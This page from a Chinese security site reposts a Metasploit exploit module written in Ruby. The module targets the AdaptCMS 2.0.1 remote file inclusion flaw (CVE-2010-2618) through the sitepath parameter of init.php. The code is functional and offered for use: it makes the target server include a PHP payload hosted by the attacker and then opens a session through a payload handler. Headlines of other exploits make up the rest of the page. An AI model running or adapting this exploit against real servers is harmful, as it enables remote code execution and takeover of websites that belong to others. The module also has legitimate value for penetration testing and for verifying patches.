首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
AdaptCMS 2.0.1 Beta Release Remote File Inclusion Vulnerability (msf)
来源:http://www.metasploit.com 作者:v3n0m 发布时间:2010-10-13  

##
#      )   )            )                     (   (         (   (    (       )     )
#  ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /(
#  )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
# ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\
#__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)
#\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ /
# \ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' < 
#  |_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
#          .WEB.ID
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking

 include Msf::Exploit::Remote::Tcp
 include Msf::Exploit::Remote::HttpClient
 include Msf::Exploit::Remote::HttpServer::PHPInclude

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'AdaptCMS 2.0.1 Beta Released Remote File Inclusion Exploit',
   'Description'    => %q{
     This module can be used to exploit Remote File Inclusion in AdaptCMS 2.0.1 or earlier in file /inc/smarty/libs/init.php.

   },
   'Author'         => [ 'v3n0m' , 'Yogyacarderlink-Indonesia' ],
   'License'        => MSF_LICENSE,
   'Version'        => '$Revision:$',
   'References'     =>     
    [
     [ 'CVE', '2010-2618' ],
     [ 'BID', '41116' ],
    ],
   'Privileged'     => false,
   'Payload'        =>
    {
     'DisableNops' => true,
     'Compat'      =>
      {
       'ConnectionType' => 'find',
      },
     'Space'       => 262144, # 256k
    },
   'Platform'       => 'php',
   'Arch'           => ARCH_PHP,
   'Targets'        => [[ 'Automatic', { }]],
   'DisclosureDate' => 'Oct 12 2010',
   'DefaultTarget' => 0))

  register_options([
   OptString.new('PHPURI', [ true , "The URI to request, with the include parameter changed to !URL!", '/inc/smarty/libs/init.php?sitepath=!URL!']),
   ], self.class)
 end

 def php_exploit

  timeout = 0.01
  uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
  print_status("Trying uri #{uri}")

  response = send_request_raw( {
    'global' => true,
    'uri' => uri,
   },timeout)

  if response and response.code != 200
   print_error("Server returned non-200 status code (#{response.code})")
  end
  
  handler
 end

end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Disk Pulse Server v2.2.34 Remo
·Max Anket v1.0 - Multiple Remo
·Acoustica BeatCraft v1.02 Buil
·Postcard Mentor - Database Dis
·Oracle Java 6 OBJECT tag "laun
·sakkis digital postcards 1.0 b
·Firefox 3.5.10 & 3.6.6 WMP Mem
·nutscards (ing) Database Discl
·Oracle Java APPLET Tag Childre
·my postcard (ing) Database Dis
·Oracle Virtual Server Agent Co
·mirabilis e-kart (tr) Database
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved